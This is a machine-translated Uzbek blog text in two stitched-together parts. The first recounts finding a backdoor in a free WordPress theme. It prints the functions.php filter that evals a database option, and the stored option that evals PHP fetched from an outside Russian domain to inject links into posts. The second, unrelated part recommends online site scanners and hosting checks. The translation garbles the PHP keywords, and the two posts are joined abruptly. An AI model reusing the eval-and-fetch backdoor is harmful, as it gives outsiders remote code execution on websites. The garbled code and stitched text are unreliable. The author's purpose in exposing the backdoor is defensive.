Men qilgan birinchi narsa, albatta, bu faylni tekshirish, uning mazmunini o'rganish, uni barcha turdagi antiviruslar, o'nlab onlayn viruslarni tekshirish xizmatlari va boshqalar bilan skanerlash edi. — oxir-oqibat, hech narsa topilmadi, hamma bir ovozdan fayl butunlay xavfsiz ekanligini ta'kidladi. Albatta, men mezbonga shubhalarimni bildirdim va siz nimanidir chalkashtirib yuborganingizni aytdim, lekin har ehtimolga qarshi, men ulardan zararli kod parchasi aniqlanganligi haqida hisobot berishlarini so'radim.

Va ular menga shunday javob berishdi

Men ushbu kod haqida Google ma'lumotlariga kirdim va jiddiy o'yladim ...

Shablonda zararli kodning bir qismini qanday topish mumkin

Ma'lum bo'lishicha, bu haqiqatan ham ahamiyatsiz bo'lmagan texnika bo'lib, manfaatdor tomonlarga sizning saytingizga ma'lumotlarni uzatish va sahifalar mazmunini sizning xabaringizsiz o'zgartirish imkonini beradi! Agar siz bepul shablondan foydalansangiz, unda Quyidagi kod uchun functions.php ni tekshirishni tavsiya qilaman:

qo'shimcha_filtr('tarkib', '_bloginfo', 10001);
funksiya _bloginfo($content)(
global $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
$co qaytarish;
) aks holda $kontentni qaytaring;
}

PHP bo'yicha juda sayoz bilimim bilan ham, global o'zgaruvchan post va kontentga bog'langan ma'lum bir filtr yaratilayotgani aniq, ular faqat blog postlari sahifalarida kontentni ko'rsatish uchun javobgardir (is_single sharti). Allaqachon shubhali, shunday emasmi? Keling, ushbu kod bizning veb-saytimizda nimani ko'rsatishini ko'rib chiqaylik.

Ma'lumotlar bazasida so'ralgan qiziqarli variant blogoption ham juda shubhali ko'rinadi. Biz MySQL ma'lumotlar bazasiga kiramiz va u erda wp_options deb nomlangan jadvalni topamiz, agar siz prefikslarni o'zgartirmagan bo'lsangiz, u sukut bo'yicha shunday ko'rinadi. Va unda biz blogoption deb nomlangan bizni qiziqtirgan qatorni topamiz

Qanday go'zal! Biz quyidagi variantni ko'ramiz

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.'&m=47&n'));

Bular. Muayyan saytdan (va ruscha) ular har qanday narsani o'z ichiga olishi mumkin bo'lgan tarkibni qaytarib berishmoqda! Har qanday miqdordagi havolalar, zararli kodlar, o'zgartirilgan matn va boshqalar. Saytning o'ziga kirganingizda, u sizga 403 kirish xatosini beradi, bu ajablanarli emas. Albatta, men bu variantni ma'lumotlar bazasidan ham olib tashladim.

Jabrlanuvchilarning ma'lumotlariga ko'ra, sizning maqolangizning aniq mazmuni odatda biron bir nuqta o'rniga faqat bitta o'zgartirish bilan qaytariladi. matnda ochiq havola yashiringan! Aytgancha, ushbu parametr shablonning o'zi o'rnatilganda ma'lumotlar bazasiga yoziladi va keyin buni muvaffaqiyatli bajaradigan kod o'zini o'zi yo'q qiladi. Va men ikki yil davomida bunday axlat bilan yashadim va shu vaqt ichida biron bir antivirus yoki xizmat menga bu tahdidni aniqlamadi. Rostini aytsam, bu hiyla men uchun ishlaganmi yoki mening xavfsizlik plaginim bu xususiyatni bloklaganmi (yoki WordPress yangilanishlaridan biri bu teshikni yopib qo'ygan bo'lsa), men buni sezmadim, lekin bu hali ham yoqimsiz.

Bepul pishloq haqida axloq

Shablonlarni "tarjimonlarimiz" (yoki ularni o'z kataloglarida joylashtirganlar)ning nafisligi sizga qanday yoqadi? Bu siz pastki qismdagi havolalarni kesib tashlashingiz uchun emas) Afsuski, shablonimni qayerdan yuklab olganimni eslay olmayman, bu uzoq vaqt oldin edi, aks holda men bir nechta mehrli narsalarni yozgan bo'lardim. Va agar o'sha paytda men hozir bo'lgan tajribamga ega bo'lsam, men mutlaqo bepul shablonni ishlatmagan bo'lardim yoki o'ta og'ir holatlarda uni noma'lum manbalardan yuklab olmagan bo'lardim!

15-20 dollarga biron bir rasmiy premium shablonni sotib olish va unda hech qanday teshik yoki shifrlangan havolalar yo'qligini bilib, tinchlikda yashash osonroq, hatto zaifliklar mavjud bo'lsa ham, ishlab chiquvchilar ushbu teshiklar bo'ladigan yangilanishni albatta chiqaradilar. yopiq. ( Aytgancha, Artem yaqinda maqola chop etdi, unda u premium shablonlar haqida gapiradi va hatto qiziquvchilar uchun shafqatsiz chegirmalar uchun reklama kodlarini beradi.)

Salom IdeaFox do'stlari!

Siz haqingizda bilmayman, lekin kechalari uxlay olmayman. Meni blog xavfsizligi muammolari qiynayapti. Menda endi kuch yo'q :-)

Men ushbu mavzu bo'yicha bir nechta bloglarni o'qib chiqdim va bu muammoni hal qilishga yordam beradigan ko'plab plaginlarni sinab ko'rdim. Va sharhlarda ular saytni himoya qilish mavzusi haqida savollar berishni boshladilar, bu meni ushbu eslatmani yozishga undadi.

Tasavvur qiling-a, siz blog yuritasiz, maqolalar yozasiz, harakat qilasiz... Va yovuz eshaklar kelib saytingizni buzadi. Menimcha, qayg'u ko'p bo'ladi.

Axir, har bir oddiy blogger o'z veb-saytini rivojlantirish uchun ko'p vaqt va kuch sarflaydi. Va ko'pchilik uchun blog yuritish odatda obsessiyaga aylanadi ... Bu erda va agar BU sodir bo'lsa :-)

Xo'sh, bu qanchalik muhimligini tushunasiz.

Nihoyat biznesga tushamiz :)

Bir necha oy oldin men xakerlik haqida eslatma yozganman. Uni albatta o'qing. Ammo oradan ancha vaqt o'tdi va men har tomonlama himoyani kuchaytirish uchun qo'shimcha choralar ko'rdim.

Keyingi eslatmalarda men bu masalaga batafsil to'xtalib o'taman. (ISP sozlamalari haqida ham eslayman va yozaman)

3. Boshqa onlayn xizmatlarda saytni tekshiring

Bunday xizmatlarning taqchilligi yo'q. Men ularning ko'pchiligi mutlaqo ahmoq va faqat reklama ko'rsatish uchun yaratilgan degan qat'iy fikrga egaman.

Doktor Web

DR.Web kompaniyasi saytlarni onlayn tekshirish uchun yaxshi xizmat ko'rsatdi. Shaxsan u menga bir marta do'stimning blogida infektsiyani topishga yordam berdi (.htaccess faylida uchinchi tomon kodi bor edi)

Tekshirish juda oddiy. URL manzilingizni kiriting va tekshirish natijasini kuting.

antivirus-alarm.ru

Dunyoning etakchi antivirus kompaniyalarining 43 ta antivirus ma'lumotlar bazasidan foydalanadigan kuchli veb-sayt skaneri.

Bu erda ham hamma narsa juda oddiy. Biz saytimizning URL manzilini kiritamiz va skanerlash natijalarini nafas bilan kutamiz.

Men bularni kutganman.

Hammasi toza, tinch uxlashingiz mumkin :-)

Bularning barchasi, albatta, yaxshi, lekin siz WordPress bloglari uchun hech qanday zarar keltirmaydigan bir nechta plaginlarni o'rnatishingiz kerak.

4. Xostingizdan saytingizni tekshirishni so'rang

Gap shundaki, hosterlar xavfsizlik masalalari haqida sizdan ko'ra ko'proq tashvishlanadilar va kuchli xavfsizlik choralariga ega. Bundan tashqari, maxsus himoya vositalari bilan.

Mana bugun siz uchun yangiligim. Keyinchalik, men sizga WordPress blogingizni buzishdan sezilarli darajada himoya qila oladigan juda kuchli plagin haqida gapirib beraman.

Men u bilan 2 oydan beri ishlayapman va undan juda mamnunman. Tushunib turib, o'zimni 3 marta man qildim: –) Qisqasi, aytadigan gapim bor.